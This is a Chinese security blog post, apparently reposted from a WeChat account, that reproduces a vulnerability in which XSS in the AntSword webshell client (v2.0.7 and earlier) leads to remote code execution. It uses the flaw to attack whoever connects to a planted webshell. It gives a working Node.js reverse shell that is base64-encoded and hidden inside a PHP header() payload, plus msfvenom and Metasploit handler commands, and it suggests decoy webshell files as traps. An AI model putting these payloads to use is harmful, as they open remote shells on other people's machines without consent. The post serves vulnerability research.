利用AntSword RCE进行溯源反制黑客

admin 2025年2月15日23:26:41评论30 views字数 4832阅读16分6秒阅读模式
利用AntSword RCE进行溯源反制黑客

点击上方“蓝字”,关注更多精彩

"我把黑客黑了"。这句话就是溯源的意思。溯源说白了就是反黑客,利用黑客留下的入侵痕迹进行回溯追踪。关于溯源的方法,实在是太多,我这里先介绍一下这个蚁剑RCE,以此漏洞进行思维发散,抛砖引玉,大家可以自行复现关于AWVS、SQLmap、CS等相关工具的溯源技巧。

本篇文章与之前的Clash RCE类似。Clash RCE可以用来钓鱼,而蚁剑RCE可以用来溯源。Clash RCE漏洞复现与高级利用(配合社工)

0x00 漏洞概述

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

2019年4月12日凌晨,有用户在中国蚁剑GitHub上提交了issue,称发现中国蚁剑存在XSS漏洞,借此可引起RCE。该漏洞是因为在webshell远程连接失败时,中国蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。这个漏洞当时爆出来后,引发了各路大佬的关注。

利用AntSword RCE进行溯源反制黑客

利用AntSword RCE进行溯源反制黑客

0x01 影响范围

AntSword <=2.0.7

利用AntSword RCE进行溯源反制黑客

0x02 实验环境搭建

下载与安装v2.0.7版本蚁剑

有个坑:在kali上,就算按照issue #3更新了依赖文件,v2.0.7的蚁剑也不能安装在Kali上,软件开发问题。大家不要踩这个坑浪费时间!所以在这里将windows物理机当做攻击机,kali当做受害机器

AntSword v2.0.7下载地址:https://github.com/AntSwordProject/antSword/releases?page=2

利用AntSword RCE进行溯源反制黑客

4.0.3 Loader不能加载老版本的蚁剑。旧版本的Loader下载地址:

https://github.com/AntSwordProject/AntSword-Loader/releases

利用AntSword RCE进行溯源反制黑客

受害机器kali

搭建apache2服务,写入一句话木马。攻击机使用蚁剑链接webshell。

利用AntSword RCE进行溯源反制黑客

0x03 漏洞复现

1、受害者查询自己的日志,发现有人入侵,并且已经控制了webshell,发现其蚁剑版本为v2.0

利用AntSword RCE进行溯源反制黑客

2、于是排查自己的网站,找到一句话木马shell.php,改成下面这段代码即可。这时攻击者再次链接webshell时,就会出现弹窗。

<?phpheader('HTTP/1.1 500 <img src=# onerror=alert(1)>');

利用AntSword RCE进行溯源反制黑客

好了,已经复现完毕了其实。但是我要扩大利用,就是反弹shell与让攻击方上线。

反弹shell

1、先来看这么一段node.js代码,在Node.js中提供了一个Net.Socket对象,用于方便调用底层Socket接口,实现数据传输的功能。Net.Socket既可以读也可以写,这个client建立socket链接,实现了将对方cmd.exe的标准输入输出与标准错误流转发到受害者自己的ip:10086端口上。

var net = require("net"), sh = require("child_process").exec("cmd.exe");var client = new net.Socket();client.connect(10086"受害者ip"function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

2、现在将这段代码进行base64加密,我这里受害者也就是kali的ip为192.168.159.160。再次声明哈,我这里的kali是受害者,是因为旧版本蚁剑在kali无法安装成功。

dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjE5Mi4xNjguMTU5LjE2MCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=

3、随后,将这段base64代码放入下方代码段的中Buffer函数中

header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjE5Mi4xNjguMTU5LjE2MCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");

4、再将上面这段代码放入shell.php里,同时自身开启监听10086端口

利用AntSword RCE进行溯源反制黑客

利用AntSword RCE进行溯源反制黑客

5、新的一天,攻击者开开心心地打开自己的蚁剑,摩拳擦掌准备后渗透,结果爆红,还以为自己的密码错了或者马没了,而此时,攻击者已经被受害者控制了。

利用AntSword RCE进行溯源反制黑客

"寇可往我亦可往!攻守易型了!"——汉武大帝

利用AntSword RCE进行溯源反制黑客

坑点:我的物理机上有火绒,复现之前需要关闭火绒,不然会报僵尸网络攻击。这个火绒报警和当时复现Clash漏洞时一模一样。

MSF上线

之前复现过Clash漏洞,我们明白Clash是基于Electron架构编写的。同样的,AntSword也是基于Electron这个github开源项目写出来的。所以他们都支持node.js,再换句话说,他们都可以用node.js的木马进行远控。

利用AntSword RCE进行溯源反制黑客

MSF生成node.js木马:

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.159.160 LPORT=10086 -f raw -o payload.js

利用AntSword RCE进行溯源反制黑客

同样的操作,将payload.js中的代码复制出来进行base64加密后,放入header中

header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`KGZ1bmN0aW9uKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gImNtZCIgOiAiL2Jpbi9zaCI7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHV0aWwgPSByZXF1aXJlKCJ1dGlsIiksIHNoID0gY3Auc3Bhd24oY21kLCBbXSk7IHZhciBjbGllbnQgPSB0aGlzOyB2YXIgY291bnRlcj0wOyBmdW5jdGlvbiBTdGFnZXJSZXBlYXQoKXsgY2xpZW50LnNvY2tldCA9IG5ldC5jb25uZWN0KDEwMDg2LCAiMTkyLjE2OC4xNTkuMTYwIiwgZnVuY3Rpb24oKSB7IGNsaWVudC5zb2NrZXQucGlwZShzaC5zdGRpbik7IGlmICh0eXBlb2YgdXRpbC5wdW1wID09PSAidW5kZWZpbmVkIikgeyBzaC5zdGRvdXQucGlwZShjbGllbnQuc29ja2V0KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50LnNvY2tldCk7IH0gZWxzZSB7IHV0aWwucHVtcChzaC5zdGRvdXQsIGNsaWVudC5zb2NrZXQpOyB1dGlsLnB1bXAoc2guc3RkZXJyLCBjbGllbnQuc29ja2V0KTsgfSB9KTsgc29ja2V0Lm9uKCJlcnJvciIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSkoKTs=`,`base64`).toString())'>");

MSF开启监听,当攻击者再次点击链接webshell爆红而不知所以然的时候,我们已经成功溯源反制。

use exploit/multi/handlerset payload nodejs/shell_reverse_tcpset lhost 192.168.159.160set lport 10086exploit -j -z

利用AntSword RCE进行溯源反制黑客

0x04 总结

1、在溯源的过程中,经常可以看到有些人使用这些蚁剑、Sqlmap、AWVS、CS等常用工具漏洞来部署陷阱,引诱对方使用这些文件。

2、蚁剑是分两个部分下载的,一个是Loader一个是蚁剑本身。其中Loader分两个大版本,4.0.3适用于 AntSword >= v2.1.0v2.0.1适用于AntSword v2.0.0 ~ v2.1.0。

3、小思路:可以故意放几个shell.php,exp.php这样的文件在网站根目录下,故意让对方扫到,让对方尝试链接的时候,直接上线被我们控制。

4、及时更新自己的蚁剑,也不要动不动就去随便连接扫出来的webshell,谨慎为妙!

5、Clash与AntSword都是基于Electron架构编写,只要是Electron架构的具有XSS致使RCE的漏洞,都可按照此种方法进行溯源反制。

利用AntSword RCE进行溯源反制黑客

往期推荐

浅谈水坑攻击—Google浏览器上线CS

内网渗透 | bash反弹失败情况与应对总结

实战经验 | 解决ssh链接VPS掉线问题

内网渗透 | 文件共享服务与ipc横向详解

内网渗透 | JS脚本下载payload与代码分析

内网渗透 | 内网隐藏技术之我见

红队建设 | 网络钓鱼技术

红队建设 | certutil详解

每日技巧05 | VM16安装macOS

CVE-2021-4034 Linux Polkit本地提权漏洞

CVE-2021-31760 Webmin CSRF致使RCE

CVE-2022-22965 Spring core RCE漏洞

          CVE-2020-1472 ZeroLogon漏洞复现利用(Netlogon域提权)

郑重声明该公众号大部分文章来自作者日常工作与学习笔记,也有少数文章是经过原作者授权转载而来,未经授权,严禁转载。如需要,请公众号私信联系作者。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与原作者以及本公众号无关。

利用AntSword RCE进行溯源反制黑客
利用AntSword RCE进行溯源反制黑客
扫码关注
人若无名便可潜心练剑
专注渗透测试、工具开发

原文始发于微信公众号(HACK技术沉淀营):利用AntSword RCE进行溯源反制黑客

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日23:26:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用AntSword RCE进行溯源反制黑客https://cn-sec.com/archives/1016745.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息